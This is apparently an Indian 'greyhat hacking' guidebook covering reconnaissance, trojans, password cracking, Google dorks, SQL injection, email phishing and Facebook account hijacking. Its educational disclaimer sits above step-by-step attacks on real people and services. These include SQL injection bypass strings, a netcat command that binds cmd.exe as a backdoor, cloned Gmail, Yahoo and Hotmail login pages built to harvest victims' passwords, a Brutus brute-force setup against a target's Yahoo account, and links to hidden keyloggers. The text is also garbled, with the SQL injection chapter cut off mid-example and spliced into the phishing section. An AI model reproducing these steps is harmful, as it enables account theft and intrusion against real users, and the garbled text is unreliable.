Hitesh Malviya is one of foremost it security expert of India released his first book on hacking named “Hackdecode...
Hackdecoders v 1.0 Official Guide to Greyhat Hacking “If you come to know the hacker’s mind then you can’t be hacked”
Hitesh Malviya
(B. Tech, C!EH, EC!SA, MCITP, CCNA)
Legal Disclaimer Any proceedings or activities related to the material contained within this volume are exclusively your liability. The misuse and mistreat of the information the book can Consequence in unlawful charges brought against the persons in question. The authors and review analyzers will not to be held responsible in the event any unlawful charges brought against any individuals misusing the information this book to break the law. This book contains material and resources that can be potential destructive. If you don’t fully comprehend something on this book, don’t study this book. Please refer to the laws and acts of your state/region/province /zone/ territory or country before accessing, using or in any other way utilizing these resources. These materials and resources are for educational purpose only. Don’t attempt to violate the law with anything enclosed here within. Neither writer of this book, review analyzers, the publishers nor anyone else affiliated in any way, is going to admit any responsibility for your proceedings, actions or trials.
About the Author Hitesh Malviya is an independent Information security Researcher, Certified Ethical Hacker & Ethical Hacking trainer and has a familiarity art of knowledge in computer field. Malviya, is more Recognized for Indian No. 1 Ethical Hacking Forum Hindustan Cyber Force. He is the founder person of Hindustan Cyber Force. He has found serious vulnerabilities in Top social networking websites orkut and facebook. He is continuously working in filed of cyber security to secure most Indian domain websites. Presently, Hitesh Malviya is working with HCF Infosec Limited as Chief executive officer and with RRN Technologies as Penetration tester. Qualifications: MCP, MCTS, MCITP, CCNA, C!EH, EC!SA
Preface Computer Hacking is the art of exploitation. It is the way enter into creator’s system without having his knowledge and carry out some changes in his original creation. Persons involved in these activities are usually known as hackers. Hacking doesn’t mean to steal someone confidential information, cracking data, cracking system and all criminal activities. Mostly people misunderstood us as criminal. Ethical Hackers are those people who use their depth knowledge to secure companies, organization networks from crackers. They are cops behind crackers and blackhat hackers. At Present time, Cyber threats are on their top. Exploits are easily available on internet By using them any technical sound person can hack into your system or website, so awareness is must to be protect yourself from these type of cyber attacks and latest threats. After reading this book you will come to know about ethical hacker’s job roles and tactics and methods used by them to secure networks and systems. You will come to know about hacker’s mind because once you come to know this after that you can’t be hacked.
“If you come to know the hacker’s mind then you Can’t be hacked” - Hitesh Malviya (Ethical Hacker)
Acknowledgements Book or Volume of this temperament is tremendously complex to write, particularly without support of the Almighty GOD. I express heartfelt credits to My parents Mr. O. R. Solanki & Mrs. Bhawana Solanki without them I have no existence. All together, I am thankful Mr. Chandshekar Rathinam, Mr. Moin Ahmed, Arjun Tyagi, Jatin garg, Neeraj dhiman, Ashish Saini and all Hindustan cyber force crew members and all individuals who facilitated me at various stage of this volume. To finish, I am thankful to you also as you are reading this book. I am sure that it will make creative and constructive role to build your digital life more secure and aware than ever before.
Contents at a Glance Chapter 1 Chapter 2 Chapter 3 Chapter 4 Chapter 5 Chapter 6 Chapter 7 Chapter 8 Chapter 9 Chapter 10 Chapter 11 Chapter 12 Chapter 13 Chapter 14 Chapter 15
Introduction to Ethical Hacking…………….8-10 Information Gathering & footprinting……...11-14 Scanning & Enumeration…………………..15-25 Trojans and Backdoors……………………..26-36 System Hacking…………………………….37-44 Google Hacking (Basic & advanced)……….45-51 Sql injection and countermeasures………….52-66 Cross site scripting and Countermeasures…..67-72 Remote File inclusion and Countermeasures……………………………73-76 Email account cracking & security………….77-85 Facebook account hacking & security……….86-94 Facebook clickjacking……………………….95-102 VPN & Proxies…………………………….103-113 Hacking Mobile Phones, PDA, Handheld Devices…………………………………….114-124 Career certifications in Information Security…………………………………….125-131
Chapter 1 Introduction Objectives:
Hacker Classes Essential Terminologies Ethical Hacking Steps to perform Ethical Hacking What Ethical Hackers Do?
Hacking is the art to gain unauthorized access to computer systems and networks. Persons behind the scene are called as Hackers. Sometimes, Hacking can be defined as make some changes in system’s code lead to the malicious change into the system.
Hacker Classes
Hackers can be divided in three classes:White Hat: - These are security guys, work as security consultants to secure companies network from cyber threats and attacks. They provide solution to defend against cyber threats. They also know as Ethical Hackers. Black Hat: - These are bad guys, they use their skills in destructive manner, they are highly skilled technology geeks use their skills in cracking servers and networks. Grey Hat: - Hacker who works in both offensive and defensive manner is called Grey hat. It is called most sophisticated category of hacker.
Essential Terminologies Threat: - An action or event that might compromise security, Threat is a potential violation of security. Vulnerability: - Existence of weakness in design, or unexpected error can lead to unexpected and undesirable event is called vulnerability. Attack: - An attack is an action that violates security.
Exploit: - Exploit is the defined way to breach security, It is used to gain unauthorized access to systems.
Ethical Hacking Ethical Hacking is the methodology to protect against Cyber threats or attacks. Person behind the scene are called Ethical Hackers. Ethical Hacker provide shield to computer networks and systems to protect against cyber threats and attacks.
Steps to perform Ethical Hacking (1)Information Gathering: It is the first step of ethical Hacking, It can be performed in two ways active and passive. Active information gathering can be performed inside the network and passive can be performed outside the network. Various online tools and remote application tools are used for this purpose. (2)Scanning: In this phase, scanning for live hosts is performed by using port scanners. Nmap is the one of best tool used for scanning purpose by Ethical Hackers (3)Gaining Access: It is the penetration phase, Hacker exploits vulnerability to gain access to the system. (4)Maintaining Access: Hacker Change ownership of the system in this phase and install backdoor to the system for further access. (5)Clearing Tracks: Clearing tracks refers to the activity to clean all log files from the compromised system. Various Log cleaners is used for this purpose.
What Ethical hackers do? “If you know the enemy and know yourself, you need not fear the result of a hundred battles”
-Sun Tzu (Art of war)
Ethical Hackers try to answer the following questions: What can Intruder (Attacker) see on the target system? (Information gathering and scanning phase) What can Intruder do with the information? (Gaining access and maintaining access phase) Does anyone at the target notice the intruder’s attempts or successes? (Covering Tracks phases)
Chapter 2
Information Gathering
Objectives:
Information Gathering Methods IP Address Lookup Extracting archive of website Mobile number Lookup Email spiders
Information gathering is the first step towards hacking of any system or company networks. You need to gather information about system or company network before launching an attack. Search engines Google, Yahoo, Bing can also be used in information gathering purpose. The use of Google search engine to retrieve information is known as Google hacking. Yahoo people and Google groups also proved helpful to retrieve information about any person or organization.
Information Gathering Methods Domain Name lookup & Whois: - Finding information about particular domain name is called domain whois lookup, several websites provide this service. We just have to provide domain name, Lookup utility will retrieve all information about domain and domain administrator. Some websites which provides this utility: http://www.whois.com/ http://who.is/ http://www.networksolutions.com/whois/index.jsp
We can also use tools for this purpose Here are some tools with download link:SmartWhois Download Link: http://download.cnet.com/SmartWhois/3000-2085_4- 10059497.html ActiveWhois Download Link: http://download.cnet.com/Active-Whois/3000-2085_4-10205156.html CountryWhois Download Link: http://www.softpedia.com/progDownload/CountryWhois-Download39324.html
DNS Lookup: DNS lookup utility is used for finding information about DNS records and name servers of any particular domain. NSLOOKUP Command: nslookup is in-built command line command used for retrieving information about dns records. Few parameters are used in process of gathering dns information (1)To retrieve authoritative name server dns record >nslookup domain name >set type=a >nslookup (2) To retrieve information about Mail Exchange server Records >nslookup domain name >set type=mx >nslookup (3) To retrieve information about CNAME records >nslookup domain name >set type=cname >nslookup (4) To retrieve information about all dns records >nslookup domain name >set type=all >nslookup Here is some websites which provides online tools for dnslookup. http://www.dnswatch.info/ http://www.dnsstuff.com/
IP address Lookup: IP address always plays important role during committing of a cyber crime. We can get information about ip address using some online tools, http://www.ipgetinfo.com/ http://ip-lookup.net/
Extracting archive of website: You can get all information about company’s website since the time it was launched at www.archive.org You can use cache option in Google search results to get the archives of the website.
Mobile Number Lookup: You can get all information about any mobile number like (Location, service provider, GPS location etc.) by using these online tools. http://www.internet4mobile.com/mobile_number_information.aspx http://www.india-cellular.com/mobile-number-locator.aspx http://www.phonecellnumberlookup.com/ http://www.trace.bharatiyamobile.com/
Email Spiders: Email spider is the application used for retrieve all email address inside any particular website. It used for gathering information about working email addresses of any company.
Here is some email spider tools:Power Email collector tool:
Download linkhttp://www.filebuzz.com/findsoftware/Power_Email_Collector/1.html
Chapter 3
Scanning & Enumeration
Objectives:
Port scanning Network scanning Vulnerability scanning Banner grabbing Scanning using Nmap Enumeration NetBIOS Enumeration Enumerating user accounts
Scanning is performed in preliminary steps before launching an attack. Scanning is performed to find following Information about the system, Specific IP addresses Operating systems System Architecture Services running on system Various Scanners are used for this scanning purpose. Types of Scanning (1)Port Scanning (2)Network scanning (3)Vulnerability Scanning
Port Scanning Port Scanning is performed for intelligence gathering about open ports about the system. Each service occupied a fixed port number to run. Here are some services which run on following port Numbers: HTTP 80 FTP 23 TELNET 25 TCP 135,139,445 HTTPS 443 Port scanning is used by hacker to getting information about unknown ports on the system by using the port they can gaining access to the system.
Here is some port Scanners can be used for this purpose, you can download from given download links below and try your hands on it. SuperScan: A windows only port scanner, pinger and resolver.
Download Link: http://www.foundstone.com/us/resources/proddesc/superscan.htm AngryIPScanner: IP address and port Scanner.
Download Link: http://www.angryziber.com/ipscan/
UnicornScan: Not your mother’s port scanner. http://www.unicornscan.org/ Scanrand: An unusually fast stateless network service and topology discover system. http://www.doxpara.com/
Network Scanning Networking scanning is the way of intelligence gathering about alive and dead hosts in the network. Various Network scanners are used for this purpose. We can also use ping command for finding active hosts on the network. Here are some Network scanners with download links, you can use these for network scanning.
SoftPerfect Network Scanner It is a free multi-threaded IP, NetBIOS and SNMP scanner with a modern interface and many advanced features. It is intended for both system administrators and general users interested in computer security. The program pings computers, scans for listening TCP/UDP ports and displays which types of resources are shared on the network (including system and hidden).
Download Link: http://www.softperfect.com/download/freeware/netscan.exe
Solarwinds Engineer’s toolset It includes 49 powerful network management, monitoring and Troubleshooting tools to easily and effectively manage your network.
Download Link: http://download.cnet.com/SolarWinds-Engineer-s-Toolset/30002651_4-10764878.html
Vulnerability
Scanning
It is the automated process to identify vulnerabilities in computer systems present in a network. Some vulnerability Scanners can be used for this purpose.Here is some Vulnerability scanner with download links below:
SAINT SAINT is another commercial vulnerability assessment tool (like Nessus, ISS Internet Scanner, or Retina). It runs on UNIX and used to be free and open source, but is now a commercial product.
Download Link: http://www.lynjonic.com/free_trial.htm
Nessus Vulnerability Scanner Nessus is a vulnerability scanner which looks for bugs in software. An attacker can use this tool to violate the security Aspects of a software product.
Features:
Plug-in architecture NASL(Nessus attack scripting Language) Can test unlimited number of hosts simultaneously Smart service recognition Smart Plug-ins Up-to-date security vulnerability database
Download Link:- www.tenable.com/products/nessus
Retina Vulnerability Scanner It can scan every machine on the target network, including a variety of operating system platforms, Networking devices, databases and third party or custom applications. It has most up-to-date vulnerability database and scanning methodology.
Download Link:223041.html
http://www.brothersoft.com/retina-network-security-scanner-
Banner Grabbing: Banner grabbing is the technique used for grab the banner of website. You can get header of website using this technique. Telnet Command line in-built tool is used for this purpose. Command: telnet domain name 80 HEAD /HTTP /1.0
Scanning using Nmap Nmap is the open source utility used for network exploration, it is designed to rapidly scan large networks. Nmap is used for carry out port scanning, OS Detection, Version detection, ping sweep and many other techniques.
Nmap Scanning options: -sT(TCP connect scan) -sS(SYN scan) -sF(FIN Scan) -sX(XMAS Scan) -sN(Null Scan) -sP(Ping Scan) -sU(UDP Scan) -sI(Idle Scan)
-sW(Window scan) -sR(RPC Scan) -sL(List/dns Scan) -PO(don’t ping) -PT(TCP Ping) -PS(SYN Ping) -PI(ICMP Ping) -PM(ICMPNetmask)
Download Link: www.nmap.org/download.htm
Enumeration Enumeration is defined as extraction of usernames, shares, machine names, resources and services, Enumeration service is conducted in intranet (LAN) environment.
NetBios Enumeration NetBios is the BIOS information of any domain over network once you extract NetBios information, you can get shares, services and all other information about domain. NetBios Enumeration can be performed by using following windows built in command line tools:
Using Net View Net View lists all hosts present in the domain and lists all shares of individual host in the domain. Commands: Net view /domain Net view \\
Using nbtstat nbtstat is the inbuilt windows command line tool used to display information about a computer’s NetBIOS connection and name tables. Run: nbtstat –A Display protocol status and current TCP/IP connections Using NBT(NetBios over TCP/IP) nbtstat [-a remotename] [-A IP address] [-c] [-n] [-r] [-R] [-s] [-S] [interval] ]
NetBIOS Nullsessions The nullsession is often referred to as the holy grail of windows hacking. Null sessions take advantage of flaws in SMB (server messaging Block) You can establish a connection with windows host by logging on with null username and password. Dumpsec is a tool used to reveal shares over a null session with the target computer.
Download Link: - http://www.systemtools.com/cgi-bin/download.pl?DumpAcl
Inter process communication (IPC) Using IPC anyone can shares or resources of any host in domain over network by creating a null session. Command: c:\net use \\ \IPC$ “” /u: “”
Null sessions Countermeasures Null sessions require access to TCP port 139 and 445. It doesn’t work in windows server 2003. You could disable SMB service to prevent from null session. The another way is to restrict anonymous user by edit the registry settings. Step 1. Open regedit32 and navigate to HKLM\SYSTEM\CurrentControlSet\LSA Step 2. Choose edit | add value Value name : Restrict Anonymous Data_type: REG_WORD Value: 2
Enumerating User accounts Two powerful tools are used for this purpose: User2sid Sid2user They can be downloaded at www.chem.msu.su/^rudnyi/NT/
Tool: Getacct, it is also used for retrieve information about user accounts on windows server 2000/NT machines. It sidesteps “Restrict anonymous=1”.
Download link: www.securityfriday.com
Chapter 4 Trojans or Backdoors Objectives:
Trojans
Types of Trojans Different ways a Trojan can get into your system Indication of Trojan attacks Port numbers use by some known Trojans Some classic Trojans Trojan detecting tools Anti Trojan softwares Backdoor programs countermeasures
Trojans Trojans are small piece of program code used to infect any computer system. It hides it presence in the infected system. Attacker sends Trojan to the victim machine when he goes online. Trojan occupied any port number on machine to run. An Attacker smartly changes the Trojan name with any predefined service on the machine, after that user can’t recognize if the Trojan exists on the machine.
Types of Trojans
Remote access Trojan Data sending Trojan Destructive Trojan DOS attack Trojan Proxy Trojan FTP Trojan
Different ways a Trojan can get into your system
Instant messenger application Internet relay chat Attachments Physical access NetBIOS(File sharing) Fake programs Untrusted sites and freeware softwares
Indications of Trojan attacks
CD-Rom drawer opens and closes by itself Wallpaper, screensaver and theme settings changed by themselves. Computer browser goes to a strange and unknown page by itself. Computer shut down and restarts by itself. Taskbar disappears and many other unusual tasks happened by itself without user interaction
Port Number use by some known Trojans Backorifice Deepthroat NetBus Whake-a-mole
UDP UDP TCP TCP
31337 or 31338 2140 or 3150 12345 or 12346 12361 or 12362
Some Classic Trojans Tini: Tini is small Trojan program which is only 3 kb in size and written in assembly language. Tini only listen to port 7777 and runs a command prompt when someone attaches to this port. An attacker cans telnet to tini server at port 7777 from tini client.
Download Link: http://ntsecurity.nu/toolbox/tini
NetBus NetBus is a Win-32k based Trojan program. Like Backorifice it allows a remote user to access and control the victim machine by the way its internet link. This virus is known as Backdoor.Netbus
Download link: http://www.filestube.com/4c22b3aa2987df5503e9,g/netbus.html
Netcat Netcat is called swiss-army knife of networking tools. It provides a basic TCP/UDP networking subsystem allow users to interact manually or via script with network applications. It has built-in source routing capabilities.
Netcat client/Server commands: Client end: c:>nc Server end: c:>nc –L –p -t –e cmd.exe
Download Link: http://netcat.sourceforge.net/
Beast Beast is a powerful Remote administration tool (RAT) built with Delphi 7. It provides server and client. An attacker manages to install beast on the remote machine. It will provide server to attacker machine. An attacker can remotely administrator the victim machine, he can send remote commands through server. It is the most powerful tool, attacker can use many resources of victim machine.
Download link: http://www.filestube.com/60e733eececb808203e9,g/Beast-v2-07.html
Trojan detecting Tools: You can detect Trojan on the remote machine using following tools:
TCP View
Download Link: http://download.cnet.com/TCPView/3000-2094_4-10796077.html
Msconfig utility
Windows in-built command,access through run window.
Hijack this
Download Link: http://download.cnet.com/Trend-Micro-HijackThis/3000-8022_4-10227353.html Super system Helper tool
Download Link: http://www.filestube.com/7M84mA9A5TaJQhTJxTcXQR/Super-System-Helper-ToolEXE.html
Anti Trojan Softwares: TrojanHunter
Download Link: http://download.cnet.com/TrojanHunter/3000-8022_4-10703997.html Spyware Doctor
Download Link: http://download.cnet.com/Spyware-Doctor/3000-8022_4-10377263.html Comodo BOclean
Download Link: http://comodo-boclean.en.softonic.com/download
Backdoor programs countermeasures Most commercial available tools detect backdoor programs before they can cause damage. Educate people not to install Applications downloaded from the internet and email attachments. File integration method can be used for detect backdoor programs on the remote machine.
Tripwire Tripwire is the system integrity Verifier(SIV). It will periodically scan all those files and any modification has been occurred in information then an alarm is raised.
Download Link: http://sourceforge.net/projects/tripwire/
MD5sum MD5sum.exe is the checksum utility. It takes MD5 digital snapshot of system files. You can check suspected file’s MD5 with the snapshot checksum. Command: md5sum *.* > md5sum.txt
Download Link: http://www.pc-tools.net/win32/md5sums/
Chapter 5
System Hacking
Objectives:
Password Cracking Password crackers Keylogger Spyware Keylogger countermeasures
An attacker can access the system by gaining access to the user accounts of remote machine. He needs to crack the password of user accounts for gaining access to the remote system.
Password Cracking It is the way to crack the passwords of system. Encrypted passwords are saved in system database. An attacker use hacking tools to crack these encrypted passwords and after using the clear text password he can access to the system. Three Methods are used to crack passwords (Offline attack):
Dictionary word attack In this method, password can be found using dictionary words saved in dictionary file. Password cracker tries to crack using different passwords from a list. It can be succeed only with poor passwords. It takes very less time.
Brute-force Attack It tries all possible combination of words to find a password. It is a time consuming method. Time limit to crack password is depended on word length of the password. Sometimes it takes 2-3 days to crack a password. It can be used with string passwords.
Hybrid attack It is the combination of Dictionary word and brute-force attacks. This technique may be used when the password is non-existing word and the attacker tries some technique to crack it.
Password Crackers Abcom PDF Password cracker is the program that break the security of PDF documents.
Download Link: http://abcom-pdf-password-cracker- pro.findmysoft.com/download/ L0phtcrack It is the SMB packet capture tool used to crack LC4 segment passwords.
Download Link: http://www.net-security.org/software.php?id=756 RainbowCrack It is the tool used to crack all possible hashes stored in rainbow table.
Download Link: http://www.net-security.org/software.php?id=515 JohntheRipper It is a command line tool designed to crack both UNIX and NT passwords.
Download Link: http://www.openwall.com/john/
0phcrack it is a windows password cracker based on the faster time memory trade-off. It uses the rainbow tables. It can crack 99% passwords of (passwords of length 6 or less composed by the characters, alphanumeric passwords of length 7 (Both case) and length 8 (lowercase only). Download Link: http://ophcrack.sourceforge.net/
Keylogger Keylogger is the remote administration tool used by hackers to record activities on a remote machine. It records keystrokes entered by a user on remote machine, and save a log file on the system. It always works in hidden mode. We can grab all kind of user accounts by using this tool. We only manage to install keylogger on the remote machine. Once you have managed to install the keylogger on the remote machine, it will periodically send you log files to your server. There are two types of keyloggers: Hardware keylogger Software keylogger
Ardamax Keylogger Ardamax keylogger is a keystroke recorder that captures user’s activity and saves it in an encrypted log file. Logs can be automatically sent to your email address, access to keylogger is password protected. It runs in invisible mode.
Download Link: http://www.box.net/shared/lidooniyjv
Actual Spy Keylogger It is designed for hidden computer monitoring. It is capable of capture all strokes, screen, clipboards, website activities and print activities.
Download Link: http://www.4shared.com/file/J28nUoDK/Actual_Spy_3_Crack.html
Spyware Spyware is a program that records computer activities on a machine. Records Keystrokes Records email messages Records IM Chat sessions Records website visited Records applications opened Captures screenshots
Acespy It separately record everything that is done on the computer and also can block websites or programs
Download Link: 10206540.html
http://download.cnet.com/AceSpy-Spy-Software/3000-2162_4-
eBlaster
It shows what the surveillance target surfs on internet and records all emails,chats,instant messages, websites visited and keystrokes typed and automatically sends this recorded information to the desired email address.
Download Link: http://www.eblaster-download.com/
PCPhoneHome PCPhoneHome tool tracks stolen laptops, when the stolen laptop is online, it will send a stealth message to the predetermined email address containing its exact location. Install the software and restart the computer Start->run->configmod Enter your email address That’s all Whenever your system is online, you will receive notification through email.
Download Link: www.pcphonehome.com
Keylogger countermeasures
Install antivirus and keep the signatures up-to-date. Use privacy keyboard while entering important user account name or passwords.
You can download privacy keyboard from http://anti-keylogger.com Install Host based IDS system on your system. Install anti-keylogger software on your system.
You can get it from http://www.anti-keyloggers.com/download.html
Chapter 6
Google Hacking (Basic & Advanced)
Objectives:
Error messages Files containing juicy information Advisories & vulnerabilities Files containing usernames Files containing passwords Pages containing login portals Various online devices Vulnerable servers
Google Hacking is the art of grabbing information by using Google search engine. Few operators are used for this purpose. Mostly Google hacking is used for finding vulnerable files and servers. You can also use Google hacking to filter search results. String Keywords used for this purpose are called Google dorks. You can get Google hacking database from http://www.hackersforcharity.org/ghdb/ and can try dorks given in the database. Here is some Example of Google Hacking given below:
Error messages "Warning: mysql_connect(): Access denied for user: '*@*" "on line" -help -forum This dork reveals logins to databases that were denied for some reason. "Parse error: parse error, unexpected T_VARIABLE" "on line" filetype: php PHP error with a full web root path disclosure "Warning: mysql_query()" "invalid query" MySQL query errors revealing database schema and usernames. filetype:log "PHP Parse error" | "PHP Warning" | "PHP Error" This search will show an attacker some PHP error logs which may contain information on which an attack can be based. IIS web server error messages intitle:"the page cannot be found" "internet information services” This query finds various types of IIS servers. This error message is fairly indicative of a somewhat unmodified IIS server, meaning it may be easier to break into.
Files containing juicy info "phpMyAdmin" "running on" inurl:"main.php" From phpmyadmin.net : "phpMyAdmin is a tool written in PHP intended to handle the administration of MySQL over the WWW." Great, easy to use, but lock it down! Things you can do include viewing MySQL runtime information and system variables, show processes, reloading MySQL, changing privileges, and modifying or exporting databases. Hacker-fodder for sure!
"robots.txt" "Disallow:" filetype:txt The robots.txt file serves as a set of instructions for web crawlers. The "disallow" tag tells a web crawler where NOT to look, for whatever reason. Hackers will always go to those places first! allinurl:cdkey.txt cdkeys exported email addresses e-mail address filetype:csv csv Loads of user information including email addresses exported in comma separated file format (.cvs). This information may not lead directly to an attack, but most certainly counts as a serious privacy violation. filetype:conf inurl:firewall -intitle:cvs These are firewall configuration files. Although these are often examples or sample files, in many cases they can still be used for information gathering purposes. filetype:reg "Terminal Server Client" These are Microsoft Terminal Services connection settings registry files. They may sometimes contain encrypted passwords and IP addresses. Financial spreadsheets: finance.xls intitle:"Index of" finance.xls "Hey! I have a great idea! Let's put our finances on our website in a secret directory so we can get to it whenever we need to!"
Advisories & vulnerabilities "Active Webcam Page" inurl:8080 Active WebCam is a shareware program for capturing and sharing the video streams from a lot of video devices. Known bugs: directory traversal and cross site scripting "Online Store - Powered by ProductCart" ProductCart is "an ASP shopping cart that combines sophisticated ecommerce features with time-saving store management tools and remarkable ease of use. It is widely used by many e-commerce sites". Multiple SQL injection vulnerabilities have been found in the product, they allow anything from gaining administrative privileges (bypassing the authentication mechanism), to executing arbitrary code. "Powered by A-CART" A-CART is an ASP shopping cart application written in VBScript. It is comprised of a number of ASP scripts and an Access database. Security vulnerability in the product allows remote attackers to download the product's database, thus gain access to sensitive information about users of the product (name, surname, address, e-mail, credit card number, and user's login-password). "Powered by GTChat 0.95"+"User Login"+"Remember my login information" There is a (adduser) remote denial of service vulnerabilty on version 0.95
Files containing usernames filetype:reg reg +intext:"internet account manager" This google search reveals users names, pop3 passwords, email addresses, servers connected to and more. The IP addresses of the users can also be revealed in some cases. inurl:admin filetype:asp inurl:userlist This search reveals userlists of administrative importance. Userlists found using this method can range from benign "message group" lists to system userlists containing passwords. inurl:admin inurl:userlist This search reveals userlists of administrative importance. Userlists found using this method can range from benign "message group" lists to system userlists containing passwords. site:extremetracking.com inurl:"login=" The search reveals usernames (right in the URL in green) and links to the sites that are signed up with extremetracking.com. From here an attacker can view any of the sites stats, including all the visitors to the site that is being tracked, including their IP adresses.
Files containing passwords ext:php intext:"$dbms""$dbhost""$dbuser""$dbpasswd""$table_prefix""phpbb_installed " Hacking a phpBB forum. Here you can gather the mySQL connection information for their forum database. View the .php info by using Google's cache feature.
filetype:ini wcx_ftp These searches for Total commander FTP passwords (encrypted) in a file called wcx_ftp.ini. Only 6 hit at the moment, but there may be more in the future. filetype:log inurl:"password.log" These files contain cleartext usernames and passwords, as well as the sites associated with those credentials. Attackers can use this information to log on to that site as that user. filetype:sql "insert into" (pass|passwd|password) Looks for SQL dumps containing cleartext or encrypted passwords.
Pages containing Login portals "site info for" "Enter Admin Password" This will take you to the cash crusader admin login screen. It is my first google hack.. also try adding index.php at the end, have fun people :) intext:"vbulletin" inurl:admincp vBulletin Admin Control Panel inurl:login.asp This is a typical login page. It has recently become a target for SQL injection. inurl::2082/frontend -demo This allows you access to CPanel login dialogues/screens.
Various online devices intitle:"ipcop - main" IPCop Firewall is a Linux firewall for home and SOHO users. IPCop can be managed from a simple web interface (which can be found and managed by Google Hackers ;)
intitle:"IVC Control Panel" intitle:"IVC Control Panel" intitle:"Live NetSnap Cam-Server feed" Netsnap Online Cameras intitle:"V1" "welcome to phone settings" password” This is a small search for the Italk BB899 Phone Adaptor login page. iTalkBB is a local and long distance calling service provided by iTalk Broadband Corporation. It combines voice and internet networks to provide inbound and outbound long distance and local calling solutions.
Vulnerable servers intitle:phpMyAdmin "Welcome to phpMyAdmin ***" "running on * as root@*" Search for phpMyAdmin installations that are configured to run the MySQL database with root privileges. "html allowed" guestbook When this is typed in google it finds websites which have HTML Enabled guestbooks. "Welcome to PHP-Nuke" congratulations This finds default installations of the postnuke CMS system. In many cases, default installations can be insecure especially considering that the administrator hasn't gotten past the first few installation steps. "Welcome to Administration" "General" "Local Authentication" inurl:admin This reveals admin site for Argo Software Design Mail Server.
Domains"
"SMTP
You can download automated google hacking tool for making your effort very easily and sufficiently. Googlag Scanner is the automated tool used for google hacking.
Download http://downloadsquad.switched.com/tag/goolag%20scanner/
Link:
Chapter 7 SQL Injection & Countermeasures Objectives:
Some string used to perform SQL Injection Some Google dorks to find vulnerable login portals How to hack website using sql vulnerable strings Error based SQL Injection Blind SQL Injection Google dorks to find sql injection vulnerable websites Automated tools SQL Injection countermeasures
SQL Injection is the method used for bypassing user authentication of any webform(Login portals).An attacker gives a malicious string input to the webform which takes the user to the admin area of websites. An attacker can add, delete files and play with website contents after gaining access to the admin area.
Some Strings used to perform SQL injection ' or 1=1-' or ‘=’ ' or 'a'='a hi' or 1=1 -' or 1=--
Some Google Dorks to find vulnerable login portals /admin/adminlogon.asp /admin/admin_login.asp /admin/admin_logon.asp /administrator/admin.asp /administrator/login.asp
How to hack website using SQL Vulnerable strings
Find any vulnerable login portal using Mentioned google dorks. Give any sql string as input to both username and password field. You can check all strings until get succeed to gain access into admin area.
Error Based SQL Injection 1). Check for vulnerability let’s say that we have some site like this http://www.site.com/news.php?id=1 Now to test if is vulnerable we add to the end of URL ' (quote), and that would be http://www.site.com/news.php?id=1' If it is vulnerable you should get an SQL error such as
"Sorry: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1” or something like that.
2). Find the number of columns To find number of columns we use statement ORDER BY. This function tells the SQL database how to order the result. We use this to find how many tables are there. You need to type order by 1/*(or 1--) and keep adding one until you get an error.
Example: http://www.site.com/news.php?id=1 order by 1/* https://www.gmail.com/login Yahoo -> https://www.login.yahoo.com Hotmail -> https://www.login.live.com Save the page as html and in notepad then go ->view->find and put action=” in find dialog box. For Gmail -> Replace action=”https://www.gmail.com/login” with action=”next.php” For Yahoo -> Replace action=”https://www.login.yahoo.com with action=”next.php” For Hotmail -> Replace action=”https://www.login.live.com with action=”next.php” Change the method to GET instead of POST then save it as index.php
Coding of next.php
Make a blank text file and save it as passwords.txt. Now we have to upload index.php,next.php and passwords.txt to any free server hosting website I prefer(my3gb.com). Here index.php is our clone page we have to send this page to the victim, Once the victim will login through the hoax page, Login information will be automatically sent to passwords.txt . Suppose our clone page address is my3gb.com/malviya/index.php then we have to send this page to victim in order to
hacking of email account. Use some social engineering techniques for making the hack effort more effective. Defense against phising attack Download netcraft antiphising toolbar to your browser from http://toolbar.netcraft.com/ For defending against phising scam.
(4)By Password Bruteforcing We can crack password of yahoo email account by using wordlist & bruteforcing method. Gmail & Hotmail account can’t be brutforced. We use Brutus tool for bruteforcing of yahoo email account passwords. Brutus http://www.hoobie.net/brutus/brutus-download.html - Official Download
Download:
We can put brutus and run it from a flash drive, it is a portable program and requires nothing to be ran. It can also be ran under WineHQ on linux (I have personally tested). Open
up
Brutus
The following settings must be set up:
and
configure
it
as
is:
*Target : pop3.yahoo.com *Attack Type : Pop3 *Connections : 60 (all the way) *Timeout : 60 (all the way) *Try to stay connected all the way *Single User (put the email to attack here) *I would suggest using a proxy (google, there normally in IP:PORT Format) If you don't already have a good wordlist, you can grab mine from here: http://www.ziddu.com/download/8565751/PasswordDictionary.zip.html Basically it will just attempt every password in the dictionary tell it finds the right password. If the dictionary attack fails, we can also attempt a Brute Force attack (also called a cryptanalysis attack) where it goes through and guesses every possible string combination. #Gmail account password can’t be bruteforced because it uses captcha system at the time of authentication process.
Email Account Security Measures (1)Best way to protect an email account from hacker is to use strong passwords. A strong password contains upper case,lower case,numbers & alphanumeric numbers. Set password by using “Mary had a little lamb. The lamb had white fleece.” Consider the first letter of each word; Eg.- MHALLTLHWF Put every second letter of abbreviation in lower case Replace “A” with “@” & “L” with “!” thus then a new password is formed which contains more then 8 characters. New Password: Mh@!Lt!hWf (2)Use sign-in seal(for yahoo users),Sign-in seal protect users from phising scam. (3)Set an alternate email address during signup,Lost password can be recovered to alternate email address. (4)Set you mobile number during signup , It helps us to recover our account. (5)Never select the option “keep me signed in” or “remember me” at time of login,If you select this option,next time it will automatically open your account on the same computer.
(6)Use email security tools (Email protector,SuperSecret). Download Link for Email protector: http://www.softpedia.com/get/Internet/Email/Mail-Utilities/Email-Protector.shtml Download Link for SuperSecret: http://download.cnet.com/SuperSecret/300018501_4-91956.html
Password Recovery Tools Mail Pass View: It is small recovery tool that reveals passwords and other account details for Yahoo, Gmail, Hotmail, outlook etc. email clients.
Download Link: http://majorgeeks.com/Mail_PassView_d3860.html Mail Password: Mail Password is universal password recovery tool for POP3 Email accounts. Download Link: http://download.cnet.com/Email-Password-Recovery-Master/300018501_4-10641123.html Password revelear javascript: This javascript is used to reveal login information hide behind astriks (*****), We just have to put the Script on the address bar, It will reveals password hide behind astriks within a minute.
Code: javascript: alert(document.getElementById('Passwd').value);
Chapter 11
Facebook account hacking & security
Objectives:
Facebook account hacking using wireshark Facebook account hacking using firesheep Facebook account hacking using recovery options Facebook account security countermeasures
Facebook is one of the most widely used social networking website with more than 750 million users, which is the reason behind becoming hot target of all hackers.
How to hack anyone facebook account when both victim and attacker are using same network? (1)Using Wireshark
First of all I must clear you even though you'll get access to victim's account you'll not get his/her password, next this trick will work only on LAN with hub. For this hack you'll need wireshark which is a packet sniffing tool, Mozilla Firefox web browser and add n edit add-on for Mozilla Firefox. Now I assume you have all above components for hacking facebook and you are connected in a hub based LAN or LAN
